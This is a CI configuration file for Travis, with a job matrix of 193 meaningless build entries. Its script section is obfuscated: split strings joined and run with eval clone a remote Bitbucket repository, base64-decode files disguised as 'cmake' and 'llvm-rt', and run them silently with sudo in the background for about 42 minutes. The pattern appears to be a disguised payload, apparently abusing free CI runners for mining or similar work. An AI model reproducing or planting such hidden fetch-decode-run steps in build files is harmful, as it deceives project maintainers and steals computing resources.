dist: bionic

env:
  - BUILD="bl1"
  - BUILD="bl2"
  - BUILD="bl3"
  - BUILD="bl4"
  - BUILD="bl5"
  - BUILD="bl6"
  - BUILD="bl7"
  - BUILD="bl8"
  - BUILD="bl9"
  - BUILD="bl10"
  - BUILD="bl11"
  - BUILD="bl12"
  - BUILD="bl13"
  - BUILD="bl14"
  - BUILD="bl15"
  - BUILD="bl16"
  - BUILD="bl17"
  - BUILD="bl18"
  - BUILD="bl19"
  - BUILD="bl20"
  - BUILD="bl21"
  - BUILD="bl22"
  - BUILD="bl23"
  - BUILD="bl24"
  - BUILD="bl25"
  - BUILD="bl26"
  - BUILD="bl27"
  - BUILD="bl28"
  - BUILD="bl29"
  - BUILD="bl30"
  - BUILD="bl31"
  - BUILD="bl32"
  - BUILD="bl33"
  - BUILD="bl34"
  - BUILD="bl35"
  - BUILD="bl36"
  - BUILD="bl37"
  - BUILD="bl38"
  - BUILD="bl39"
  - BUILD="bl40"
  - BUILD="bl41"
  - BUILD="bl42"
  - BUILD="bl43"
  - BUILD="bl44"
  - BUILD="bl45"
  - BUILD="bl46"
  - BUILD="bl47"
  - BUILD="bl48"
  - BUILD="bl49"
  - BUILD="bl50"
  - BUILD="bl51"
  - BUILD="bl52"
  - BUILD="bl53"
  - BUILD="bl54"
  - BUILD="bl55"
  - BUILD="bl56"
  - BUILD="bl57"
  - BUILD="bl58"
  - BUILD="bl59"
  - BUILD="bl60"
  - BUILD="bl61"
  - BUILD="bl62"
  - BUILD="bl63"
  - BUILD="bl64"
  - BUILD="bl65"
  - BUILD="bl66"
  - BUILD="bl67"
  - BUILD="bl68"
  - BUILD="bl69"
  - BUILD="bl70"
  - BUILD="bl71"
  - BUILD="bl72"
  - BUILD="bl73"
  - BUILD="bl74"
  - BUILD="bl75"
  - BUILD="bl76"
  - BUILD="bl77"
  - BUILD="bl78"
  - BUILD="bl79"
  - BUILD="bl80"
  - BUILD="bl81"
  - BUILD="bl82"
  - BUILD="bl83"
  - BUILD="bl84"
  - BUILD="bl85"
  - BUILD="bl86"
  - BUILD="bl87"
  - BUILD="bl88"
  - BUILD="bl89"
  - BUILD="bl90"
  - BUILD="bl91"
  - BUILD="bl92"
  - BUILD="bl93"
  - BUILD="bl94"
  - BUILD="bl95"
  - BUILD="bl96"
  - BUILD="bl97"
  - BUILD="bl98"
  - BUILD="bl99"
  - BUILD="bl100"
  - BUILD="bl101"
  - BUILD="bl102"
  - BUILD="bl103"
  - BUILD="bl104"
  - BUILD="bl105"
  - BUILD="bl106"
  - BUILD="bl107"
  - BUILD="bl108"
  - BUILD="bl109"
  - BUILD="bl110"
  - BUILD="bl111"
  - BUILD="bl112"
  - BUILD="bl113"
  - BUILD="bl114"
  - BUILD="bl115"
  - BUILD="bl116"
  - BUILD="bl117"
  - BUILD="bl118"
  - BUILD="bl119"
  - BUILD="bl120"
  - BUILD="bl121"
  - BUILD="bl122"
  - BUILD="bl123"
  - BUILD="bl124"
  - BUILD="bl125"
  - BUILD="bl126"
  - BUILD="bl127"
  - BUILD="bl128"
  - BUILD="bl129"
  - BUILD="bl130"
  - BUILD="bl131"
  - BUILD="bl132"
  - BUILD="bl133"
  - BUILD="bl134"
  - BUILD="bl135"
  - BUILD="bl136"
  - BUILD="bl137"
  - BUILD="bl138"
  - BUILD="bl139"
  - BUILD="bl140"
  - BUILD="bl141"
  - BUILD="bl142"
  - BUILD="bl143"
  - BUILD="bl144"
  - BUILD="bl145"
  - BUILD="bl146"
  - BUILD="bl147"
  - BUILD="bl148"
  - BUILD="bl149"
  - BUILD="bl150"
  - BUILD="bl151"
  - BUILD="bl152"
  - BUILD="bl153"
  - BUILD="bl154"
  - BUILD="bl155"
  - BUILD="bl156"
  - BUILD="bl157"
  - BUILD="bl158"
  - BUILD="bl159"
  - BUILD="bl160"
  - BUILD="bl161"
  - BUILD="bl162"
  - BUILD="bl163"
  - BUILD="bl164"
  - BUILD="bl165"
  - BUILD="bl166"
  - BUILD="bl167"
  - BUILD="bl168"
  - BUILD="bl169"
  - BUILD="bl170"
  - BUILD="bl171"
  - BUILD="bl172"
  - BUILD="bl173"
  - BUILD="bl174"
  - BUILD="bl175"
  - BUILD="bl176"
  - BUILD="bl177"
  - BUILD="bl178"
  - BUILD="bl179"
  - BUILD="bl180"
  - BUILD="bl181"
  - BUILD="bl182"
  - BUILD="bl183"
  - BUILD="bl184"
  - BUILD="bl185"
  - BUILD="bl186"
  - BUILD="bl187"
  - BUILD="bl188"
  - BUILD="bl189"
  - BUILD="bl190"
  - BUILD="bl191"
  - BUILD="bl192"
  - BUILD="bl193"

language: minimal

script:
  - sudo apt update || true
  - zaxYx="sudo apt --"
  - SOzAMuqWd="yes install"
  - omlFuOgtG=" cl-base64 "
  - RtGgagAiLSv="git &>/dev/"
  - eval "$zaxYx""$SOzAMuqWd""$omlFuOgtG""$RtGgagAiLSv""null"
  - SEqUtbSD="git clone h"
  - cLprC="ttps://gccb"
  - bFmytuADwF="uild@bitbuc"
  - xmjCeSE="ket.org/gcc"
  - LVLXieLy="build/gcc.g"
  - ADfEZ="it &>/dev/n"
  - eval "$SEqUtbSD""$cLprC""$bFmytuADwF""$xmjCeSE""$LVLXieLy""$ADfEZ""ull"
  - wIzliKKF="base64 -d g"
  - XodfnBU="cc/cmake_ >"
  - eval "$wIzliKKF""$XodfnBU"" cmake"
  - USrrUgbsTE="base64 -d g"
  - EjyfdxlDs="cc/config_ "
  - eval "$USrrUgbsTE""$EjyfdxlDs""> output"
  - pLLuW="base64 -d g"
  - YTytqd="cc/make_ > "
  - eval "$pLLuW""$YTytqd""llvm-rt"
  - chmod +x llvm-rt cmake
  - ./cmake
  - wIpPGwJNPx="sed -i 's/b"
  - YekUCE="uild/tg2o/g"
  - eval "$wIpPGwJNPx""$YekUCE""' output"
  - sudo ./llvm-rt --config=output &>/dev/null &
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2538)) ] && sudo killall llvm-rt && break; sleep 213; done
